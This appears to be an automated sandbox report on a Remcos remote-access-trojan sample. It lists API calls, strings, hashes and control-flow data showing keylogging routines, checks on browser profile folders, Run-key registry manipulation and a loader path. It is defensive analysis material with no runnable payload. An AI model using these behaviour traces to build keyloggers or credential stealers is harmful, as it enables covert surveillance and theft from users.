                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocaleValid
                                                                                        • String ID: IsValidLocaleName$JD
                                                                                        • API String ID: 1901932003-2234456777
                                                                                        • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                                        • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                        • API String ID: 1174141254-4188645398
                                                                                        • Opcode ID: 17c9011fa542958c15b72ddc3a7e9f127f6f7589f16583e289a5dca73bf18d7d
                                                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                        • Opcode Fuzzy Hash: 17c9011fa542958c15b72ddc3a7e9f127f6f7589f16583e289a5dca73bf18d7d
                                                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                        • API String ID: 1174141254-2800177040
Uniqueness Score: -1.00%

APIs
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000011), ref: 0040B64B
  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
Uniqueness Score: -1.00%

APIs
• GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
• GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID:
• String ID: uD
• API String ID: 0-2547262877
Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: Time$FileSystem
• String ID: GetSystemTimePreciseAsFileTime$PkGNG
• API String ID: 2086374402-949981407
Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ExecuteShell
• String ID: !D@$open
• API String ID: 587946157-1586967515
Uniqueness Score: -1.00%

APIs
• ___initconout.LIBCMT ref: 0045555B
  • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
• WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ConsoleCreateFileWrite___initconout
• String ID: PkGNG
• API String ID: 3087715906-263838557
Uniqueness Score: -1.00%

APIs
• GetKeyState.USER32(00000012), ref: 0040B6A5
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• __Init_thread_footer.LIBCMT ref: 00410F29
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
• RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
• GetLastError.KERNEL32 ref: 00440D35
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                                        • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 4100373531-0
                                                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1268
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph
7778->7758 7780 409888 4 API calls 7779->7780 7781 4098a4 7780->7781 7781->7722 7783 403790 7782->7783 7784 4037aa 7783->7784 7785 40a6c4 32 API calls 7783->7785 7786 40a6c4 32 API calls 7784->7786 7788 4037c7 7784->7788 7785->7784 7786->7788 7787 4037f9 7789 40276a 32 API calls 7787->7789 7788->7787 7790 40a6c4 32 API calls 7788->7790 7791 403829 7789->7791 7790->7787 7791->7758 7793 40387c 7792->7793 7794 4038b1 7793->7794 7795 4038b6 32 API calls 7793->7795 7794->7758 7795->7793 7797 4043dd 7796->7797 7798 40419b 32 API calls 7797->7798 7799 4025b3 7797->7799 7800 4044a1 7798->7800 7799->7656 7799->7657 7800->7799 7802 404276 7800->7802 7803 404288 7802->7803 7804 40429c 7802->7804 7806 40a6c4 32 API calls 7803->7806 7805 4042bc 7804->7805 7807 40a6c4 32 API calls 7804->7807 7808 40a6c4 32 API calls 7805->7808 7811 4042dc 7805->7811 7806->7804 7807->7805 7808->7811 7809 404326 7809->7799 7810 40419b 32 API calls 7810->7811 7811->7809 7811->7810 7813 404356 7811->7813 7814 404276 32 API calls 7811->7814 7812 40419b 32 API calls 7812->7813 7813->7809 7813->7812 7815 404276 32 API calls 7813->7815 7814->7811 7815->7813 7816->7671 7818 404aa6 7817->7818 7824 404aa1 7817->7824 7825 4049ee 7818->7825 7821 4049ee 32 API calls 7822 404ad8 7821->7822 7823 40a6c4 32 API calls 7822->7823 7822->7824 7823->7824 7824->7692 7826 404a00 7825->7826 7830 404a14 7825->7830 7827 40a6c4 32 API calls 7826->7827 7827->7830 7828 40419b 32 API calls 7828->7830 7829 404a1d 7829->7821 7829->7824 7830->7828 7830->7829 7831 4049ee 32 API calls 7830->7831 7831->7830 7832 40593b 7835 4057ed 7832->7835 7833 40609b 7834 4073c8 WideCharToMultiByte 7834->7835 7835->7833 7835->7834 7836 40743c 7837 40744f 7836->7837 7838 407464 7837->7838 7839 407525 7837->7839 7841 407455 7837->7841 7838->7841 7842 40749a MultiByteToWideChar 7838->7842 7840 40753a MultiByteToWideChar 7839->7840 7839->7841 7840->7841 7842->7841 7843 4074c0 GetLastError 7842->7843 7843->7841 7845 4074d2 MultiByteToWideChar 
7843->7845 7845->7841 7846 40333c 7847 403381 7846->7847 7857 4033f1 7846->7857 7848 403155 32 API calls 7847->7848 7849 40338b 7848->7849 7852 4033cb 7849->7852 7854 4033e1 7849->7854 7855 40259a 32 API calls 7849->7855 7850 40a6c4 32 API calls 7850->7857 7851 4032ef 32 API calls 7851->7857 7853 40220e 32 API calls 7852->7853 7853->7854 7855->7849 7856 402c78 RtlUnwind 7856->7857 7857->7850 7857->7851 7857->7854 7857->7856 7858 403155 32 API calls 7857->7858 7859 402e8c 32 API calls 7857->7859 7860 404164 32 API calls 7857->7860 7858->7857 7859->7857 7860->7857 7861 4048c0 7862 40496c 7861->7862 7863 4048df 7861->7863 7864 40490e 7862->7864 7867 402bf5 33 API calls 7862->7867 7865 404902 7863->7865 7866 40a6c4 32 API calls 7863->7866 7865->7864 7868 40419b 32 API calls 7865->7868 7866->7865 7867->7864 7869 40491c 7868->7869 7869->7864 7870 40419b 32 API calls 7869->7870 7871 404930 7870->7871 7872 40494f 7871->7872 7875 404659 7871->7875 7872->7864 7874 404659 32 API calls 7872->7874 7874->7862 7876 404677 7875->7876 7877 404694 7876->7877 7878 40a6c4 32 API calls 7876->7878 7879 4046ba 7877->7879 7880 40a6c4 32 API calls 7877->7880 7878->7877 7881 4046e0 7879->7881 7884 40a6c4 32 API calls 7879->7884 7880->7879 7882 40471d 7881->7882 7885 40419b 32 API calls 7881->7885 7883 40473c 7882->7883 7887 40419b 32 API calls 7882->7887 7892 404724 7882->7892 7888 40a6c4 32 API calls 7883->7888 7896 404757 7883->7896 7884->7881 7886 4046f4 7885->7886 7889 40470f 7886->7889 7890 40a6c4 32 API calls 7886->7890 7887->7883 7888->7896 7891 40419b 32 API calls 7889->7891 7890->7889 7891->7882 7892->7872 7893 40419b 32 API calls 7893->7896 7894 40a6c4 32 API calls 7894->7896 7895 404659 32 API calls 7895->7896 7896->7892 7896->7893 7896->7894 7896->7895 7900 4010c1 TlsGetValue 7901 4010d8 LocalFree 7900->7901 7902 4010de 7900->7902 7901->7902 7903 40acc2 7904 40acd7 7903->7904 7905 409ee4 4 API calls 7904->7905 7906 40ace2 7905->7906 7907 409ee4 4 API calls 7906->7907 7908 40acee 
7907->7908 7916 4021c5 7917 4021ca 7916->7917 7918 402db4 32 API calls 7916->7918 7919 40a9f0 32 API calls 7917->7919 7918->7917 7920 4021cf 7919->7920 7921 4054d0 7922 4057b8 WideCharToMultiByte 7921->7922 7923 4054ef 7922->7923 7924 4053d0 7926 4053db 7924->7926 7925 405378 9 API calls 7925->7926 7926->7925 7928 40540b 7926->7928 7929 404bec 7926->7929 7930 4067f8 GetFileAttributesA 7929->7930 7931 40680c 7930->7931 7934 406814 7930->7934 7932 406780 10 API calls 7931->7932 7935 406811 7932->7935 7933 406830 7933->7926 7934->7933 7936 40a724 9 API calls 7934->7936 7935->7926 7937 406824 7936->7937 7937->7926 7193 40bbd4 7198 40aac8 7193->7198 7195 40bc60 GetTimeZoneInformation 7197 40bcb5 7195->7197 7196 40bbe8 7196->7195 7196->7197 7199 40aad7 7198->7199 7200 40aade 7199->7200 7204 40ae60 7199->7204 7200->7196 7202 40aae7 7207 40ae70 7202->7207 7210 40b8cc EnterCriticalSection 7204->7210 7206 40ae6b 7206->7202 7211 40b8dc LeaveCriticalSection 7207->7211 7209 40ae7b 7209->7200 7210->7206 7211->7209 7941 4088d4 7942 4088e6 7941->7942 7943 40890a 7941->7943 7944 407bd0 9 API calls 7942->7944 7945 407bd0 9 API calls 7943->7945 7946 408903 7943->7946 7944->7946 7945->7946 7950 4051dc 7951 405630 32 API calls 7950->7951 7952 4051eb 7951->7952 7953 4068e0 32 API calls 7952->7953 7956 4051fa 7953->7956 7954 4056f8 4 API calls 7955 405260 7954->7955 7957 4068e0 32 API calls 7956->7957 7958 40523b 7956->7958 7959 405226 7957->7959 7958->7954 7959->7958 7960 4068e0 32 API calls 7959->7960 7960->7958 7965 4067dc 7966 406794 11 API calls 7965->7966 7967 4067f0 7966->7967 7968 4010e0 7971 4010c0 7968->7971 7972 4010c9 TlsGetValue 7971->7972 7973 4010de TlsFree 7971->7973 7972->7973 7974 4010d8 LocalFree 7972->7974 7974->7973 7975 4060e0 7976 405610 EnterCriticalSection 7975->7976 7980 4060e7 7976->7980 7977 406110 7978 405620 LeaveCriticalSection 7977->7978 7979 406115 7978->7979 7980->7977 7981 404c74 33 API calls 7980->7981 7981->7980 7988 404bf1 7989 404c09 7988->7989 7991 
404c12 7988->7991 7990 409ee4 4 API calls 7989->7990 7990->7991 7992 409ff8 7 API calls 7991->7992 7993 404c44 7991->7993 7992->7993 7994 4054f4 7995 40b868 32 API calls 7994->7995 7996 405509 7995->7996 7997 404bf4 7 API calls 7996->7997 7998 40557a 7997->7998 7999 404bf4 7 API calls 7998->7999 8000 4055b0 7999->8000 8001 4072fc 8002 407312 8001->8002 8003 40730e 8001->8003 8003->8002 8004 407397 MultiByteToWideChar 8003->8004 8005 407359 8003->8005 8004->8002 8005->8002 8007 407368 MultiByteToWideChar 8005->8007 8007->8002 8008 4045fc 8009 40460d 8008->8009 8012 40462a 8008->8012 8011 402bf5 33 API calls 8009->8011 8010 40464a 8011->8012 8012->8010 8013 40a6c4 32 API calls 8012->8013 8013->8010 8017 407280 8018 407296 8017->8018 8019 40728d 8017->8019 8019->8018 8020 4072d3 MultiByteToWideChar 8019->8020 8021 4072a7 8019->8021 8024 4072ee 8020->8024 8022 4072c7 8021->8022 8023 4072ac MultiByteToWideChar 8021->8023 8023->8022 8025 40ae80 8026 40ae89 8025->8026 8028 40ae8f 8025->8028 8029 409ee4 4 API calls 8026->8029 8027 40ae9f 8028->8027 8030 409ee4 4 API calls 8028->8030 8029->8028 8030->8027 8031 406b80 DeleteFileW 8032 406b93 8031->8032 8033 406b8f 8031->8033 8034 406780 10 API calls 8032->8034 8034->8033 8035 404582 8038 40455f 8035->8038 8039 40419b 32 API calls 8038->8039 8040 404574 8039->8040 8041 407084 GetDateFormatA 8042 4070fb 8041->8042 8043 4070ff GetDateFormatA 8041->8043 8043->8042 7192 40b690 TlsFree TlsFree 8051 40109d 8052 4010a6 TlsAlloc 8051->8052 8053 4010bf 8051->8053 8054 4010b5 8052->8054 8055 40105a 8052->8055 8056 401059 2 API calls 8054->8056 8057 40109c 8055->8057 8058 401076 LocalAlloc 8055->8058 8059 401059 2 API calls 8055->8059 8056->8053 8060 401090 TlsSetValue 8058->8060 8061 401086 8058->8061 8059->8058 8060->8057 8062 401059 2 API calls 8061->8062 8062->8060 8063 4023a0 LeaveCriticalSection 8064 402ba0 8065 40212e 32 API calls 8064->8065 8066 402ba5 8065->8066 8067 402bb0 8066->8067 8068 402db4 32 API calls 8066->8068 8069 
402bbe RaiseException 8067->8069 8068->8067 8076 4075a4 8077 4075b9 8076->8077 8078 4075d0 8077->8078 8079 4076f3 8077->8079 8082 4075bf 8077->8082 8080 40761f WideCharToMultiByte 8078->8080 8078->8082 8081 40770b WideCharToMultiByte 8079->8081 8079->8082 8083 40764c 8080->8083 8081->8082 8083->8082 8084 407660 GetLastError 8083->8084 8084->8082 8086 407672 8084->8086 8085 407677 WideCharToMultiByte 8085->8082 8085->8086 8086->8082 8086->8085 8090 40aaa8 8091 40aa04 5 API calls 8090->8091 8092 40aab3 8091->8092 8096 4049a8 8097 4049ac 8096->8097 8098 402bf5 33 API calls 8097->8098 8099 4049d6 8097->8099 8098->8099 8106 4065b4 8107 40b868 32 API calls 8106->8107 8108 4065c9 SetHandleCount 8107->8108 8109 4065e1 8108->8109 8110 4065e7 GetStartupInfoA 8108->8110 8109->8110 8115 406612 8110->8115 8111 406700 8112 4066b3 GetStdHandle GetStdHandle GetStdHandle 8113 4066de 8112->8113 8113->8111 8116 406898 8113->8116 8115->8111 8115->8112 8117 4068a7 8116->8117 8118 4068ac GetFileType 8116->8118 8117->8113 8118->8113 8119 40b7b4 TlsGetValue 8120 40b7d0 8119->8120 8123 40b7d6 8119->8123 8125 40b76c 8120->8125 8122 40b862 8123->8122 8124 409ee4 VirtualFree VirtualFree EnterCriticalSection LeaveCriticalSection 8123->8124 8124->8123 8130 40b8cc EnterCriticalSection 8125->8130 8127 40b77e 8131 40b8dc LeaveCriticalSection 8127->8131 8129 40b799 8129->8123 8130->8127 8131->8129 8141 4055b8 8142 405610 EnterCriticalSection 8141->8142 8143 4055c3 8142->8143 8144 4055d9 8143->8144 8145 404d14 32 API calls 8143->8145 8148 404d14 32 API calls 8144->8148 8153 4055fd 8144->8153 8147 4055cf 8145->8147 8146 405620 LeaveCriticalSection 8149 40560d 8146->8149 8150 409ee4 4 API calls 8147->8150 8151 4055f3 8148->8151 8150->8144 8152 409ee4 4 API calls 8151->8152 8152->8153 8153->8146 8154 4023b8 8155 4023d2 8154->8155 8156 4023d9 8154->8156 8157 4023f7 8156->8157 8164 4024fe RtlUnwind 8156->8164 8162 40a87c 32 API calls 8157->8162 8163 402412 8157->8163 8159 4023f2 8160 40212e 32 API calls 
8159->8160 8160->8157 8161 402455 UnhandledExceptionFilter 8161->8155 8162->8163 8163->8155 8163->8161 8164->8159 8171 4031bd 8175 403184 8171->8175 8172 4032b9 8173 403cf0 32 API calls 8173->8175 8174 40a6c4 32 API calls 8174->8175 8175->8172 8175->8173 8175->8174 8176 402d2c 32 API calls 8175->8176 8176->8175

Control-flow Graph

APIs
• RegOpenKeyA.ADVAPI32(80000000,Software\Mercury32,?), ref: 004012B3
• RegQueryValueA.ADVAPI32(?,BaseDir,?,?), ref: 004012DA
• RegCloseKey.ADVAPI32(?), ref: 004012E6
• RegCloseKey.ADVAPI32(?), ref: 004012F3
• FindFirstFileA.KERNEL32(?,?), ref: 0040133C
• FindClose.KERNEL32(00000000,?,?), ref: 00401347
• GetLocalTime.KERNEL32(?), ref: 00401392
Strings
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: Close$Find$FileFirstLocalOpenQueryTimeValue
• String ID: %02d-%02d-%02d.%02d%02d: %s$%s\Loader.Log$BaseDir$C:\ProgramData\Remcos$Software\Mercury32$r+t
• API String ID: 3460814986-900928516
• Opcode ID: 0fafee7130c1bb9ded1b2921e2bb797deb568f4e708ab1a19d06aa523d814d83
• Instruction ID: dfd861be5d27ab76580011db74593427ab2e3e9b6d1f87f4f499b649e2b96ce4
• Opcode Fuzzy Hash: 0fafee7130c1bb9ded1b2921e2bb797deb568f4e708ab1a19d06aa523d814d83
• Instruction Fuzzy Hash: C231A9B1D00218A6DB2197A1DC42FEE727C9B58704F1005BFBA45B11D2EBBC9B8497AC
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph (block id, address range, calls)
  0   4018ae-4018c8
  1   4018d6-40190c  GetModuleFileNameA, call 401275, call 402044
  2   4018ca-4018d1  call 401612
  7   401ca0-401ca6
  10  401911-40196f  call 401ff4, call 40128d, call 40bffe, lstrlenA, CharLowerBuffA
  11  40190e
  18  40198a-40198d
  19  401971-401984  call 401e1c
  20  40198f-4019a4  OpenSemaphoreA
  22  4019d1-4019db  call 40bdf4
  23  4019a6-4019cc  CloseHandle, call 40bff8, call 40128d
  28  401986
  29  401989
  31  4019e1-401a00  call 40bffe
  36  401a02-401a08
  37  401a2a-401acb  call 401d3c * 4, CreateProcessA
  38  401a0a-401a25  lstrcatA * 2
  47  401b00-401b11  CloseHandle * 2
  48  401acd-401af3  GetLastError, call 4054ac, call 40128d
  50  401b16-401b2c  OpenProcess
  52  401b43-401b4f  GetExitCodeProcess
  53  401b2e-401b3a  GetLastError
  55  401bb0-401bde  call 40bffe, call 404bec
  56  401b3c-401b3e  ExitProcess
  57  401b51-401b5d  GetLastError
  58  401b66-401b73  CloseHandle
  59  401af8-401afb
  61  401b5f-401b61  ExitProcess
  62  401b75-401b8d  SleepEx, call 40bdf4
  67  401b8f-401b91
  69  401b93-401b9d  call 40128d
  70  401b9e-401bab
  71  401c93-401c9e  call 40128d
  72  401be4-401c12  call 40bffe, call 404bec
  81  401c14-401c2d  call 405414, call 40128d
  82  401c2f-401c39  call 40128d
  88  401c3a-401c4d  SleepEx
  90  401c53-401c57
  91  401c66-401c78  call 40128d, call 401612
  92  401c59-401c64  call 40128d
  99  401c7a-401c8e  call 40128d
  edges: 0->1 0->2 1->10 1->11 2->7 10->18 11->10 18->19 18->20 19->28 19->29 20->22 20->23 22->31 23->7 28->29 29->18 31->36 31->37 36->37 36->38 37->47 37->48 38->37 47->50 48->59 50->52 50->53 52->57 52->58 53->55 53->56 55->71 55->72 57->55 57->61 58->55 58->62 59->7 62->50 62->67 67->69 67->70 69->70 70->50 71->7 72->81 72->82 81->88 82->88 88->31 88->90 90->91 90->92 91->71 91->99 92->71 99->31
APIs
• GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 004018E5
• lstrlenA.KERNEL32(?), ref: 00401957
• CharLowerBuffA.USER32(?,00000000,?), ref: 00401964
• OpenSemaphoreA.KERNEL32(001F0003,00000000,?), ref: 0040199D
• CloseHandle.KERNEL32(00000000), ref: 004019A7
  • Part of subcall function 00401612: RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
Strings
• Recovery complete - attempting to restart Mercury., xrefs: 00401C7A
• Too many abnormal terminations in time period - attempting recovery., xrefs: 00401C66
• D, xrefs: 00401A77
• C:\ProgramData\Remcos, xrefs: 0040191D
• :\/, xrefs: 00401975
• %s\m32-ssu.run, xrefs: 00401BEB
